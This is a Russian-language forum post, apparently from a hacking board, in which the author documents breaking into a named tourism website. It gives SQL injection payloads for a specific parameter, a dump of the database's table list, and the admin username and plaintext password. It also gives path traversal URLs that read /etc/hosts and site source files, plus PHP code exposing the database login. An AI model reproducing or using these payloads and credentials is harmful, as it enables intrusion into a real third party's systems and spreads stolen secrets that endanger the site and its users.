| kacergei |
14.08.2019 09:01 |
Не знаю насколько еще актуально, но пока Вот что удалось собрать:
.SpoilerTarget" type="button">Spoiler: phpinfo();
Код:
Code:
onlytourism.com/php.php
.SpoilerTarget" type="button">Spoiler: sql-injection
Код:
Code:
URL: onlytourism.com/tours-details.php?type=16&id=31&arrdate=23%2F08%2F2019&adults=3&children=2
Код:
Code:
Вектор:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=16&id=31' AND 2317=2317 AND 'TZhC'='TZhC&arrdate=23/08/2019&adults=3&children=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=16&id=31' AND SLEEP(5) AND 'RAuE'='RAuE&arrdate=23/08/2019&adults=3&children=2
---
Таблицы БД
Код:
Code:
Database: onlytour_naddaf
[46 tables]
+-----------------------------------------+
| onlytourism_admin |
| onlytourism_adsense |
| onlytourism_banners |
| onlytourism_bannersmid |
| onlytourism_bookpackages |
| onlytourism_booktour |
| onlytourism_bookvisa |
| onlytourism_category |
| onlytourism_categorychannel |
| onlytourism_categorydir |
| onlytourism_categoryhd |
| onlytourism_categoryphoto |
| onlytourism_cms |
| onlytourism_configurations |
| onlytourism_country |
| onlytourism_countryliving |
| onlytourism_downloads |
| onlytourism_gallery |
| onlytourism_gallery_images |
| onlytourism_news |
| onlytourism_news_admin |
| onlytourism_news_maillist_subscribers |
| onlytourism_news_newsletter |
| onlytourism_news_newsletter_attachments |
| onlytourism_news_newsletter_maillist |
| onlytourism_news_newsletter_templates |
| onlytourism_news_newslettersubscriber |
| onlytourism_packages |
| onlytourism_prod_images |
| onlytourism_prod_imagesdir |
| onlytourism_prod_imageshd |
| onlytourism_prod_price |
| onlytourism_prod_pricedir |
| onlytourism_prod_pricehd |
| onlytourism_products |
| onlytourism_products_catg |
| onlytourism_products_catgdir |
| onlytourism_products_catghd |
| onlytourism_productsdir |
| onlytourism_productshd |
| onlytourism_projectcat_images |
| onlytourism_projectcategory |
| onlytourism_services |
| onlytourism_testimonials |
| onlytourism_tours |
| onlytourism_vacancies |
+-----------------------------------------+
Данные администратора
Код:
Code:
Database: onlytour_naddaf
Table: onlytourism_admin
[1 entry]
+----+-------------+-------------+
| id | user | pwd |
+----+-------------+-------------+
| 1 | tourismcms | onlypass563 |
+----+-------------+-------------+
.SpoilerTarget" type="button">Spoiler: Скачивание файлов
/etc/hosts и путь к корневому index.php
Код:
Code:
onlytourism.com/download_file.php?fname=../../../../etc/hosts
onlytourism.com/download_file.php?fname=../../../../home/onlytour/public_html/index.php
Файлы которые удалось найти самому (чисто поверхностно):
Код:
Code:
/includes/analytics.php
/includes/banner-inner.php
/includes/footer.php
/includes/header.php
/includes/subscribe.php
/lib/adsense.php
/lib/application-footer.php
/lib/application-top.php
/lib/bannersmid.php
/lib/category.php
/lib/categorydir.php
/lib/categoryhd.php
/lib/class.phpmailer.php
/lib/cms.php
/lib/configurations.php
/lib/conmanager.php
/lib/connect.php
/lib/news.php
/lib/products.php
/lib/seourl.php
/pagination/pagination.class.php
/about.php
/blog.php
/booking-tour.php
/cms.php
/contact.php
/downloads.php
/download_file.php
/get-ajax.php
/holiday-packages.php
/index.php
/packages-details.php
/php.ini
/tours-details.php
/tours-search.php
/tours.php
.SpoilerTarget" type="button">Spoiler: Данные для коннекта к БД
Отрывок кода
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]MySqlConnectionManager[/COLOR][COLOR="#007700"]extends[/COLOR][COLOR="#0000BB"]ConnectionManager
[/COLOR][COLOR="#007700"]{
function[/COLOR][COLOR="#0000BB"]MySqlConnectionManager[/COLOR][COLOR="#007700"]()
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hostName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"localhost"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]userName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"onlytour_naddaft"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]passWord[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"QYi8Lug4swSEr5J"[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]doConnection[/COLOR][COLOR="#007700"]()
{
if(!([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]conHandle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hostName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]userName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]passWord[/COLOR][COLOR="#007700"])))
{
die([/COLOR][COLOR="#DD0000"]"Cannot Connect to Host"[/COLOR][COLOR="#007700"]);
}
}
function[/COLOR][COLOR="#0000BB"]selectDatabase[/COLOR][COLOR="#007700"]()
{
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"onlytour_naddaf"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]conHandle[/COLOR][COLOR="#007700"]);
}
}
[/COLOR][/COLOR]
PS: Если найду админку обновлю пост, а так надеюсь данная информация посодействует в поисках |
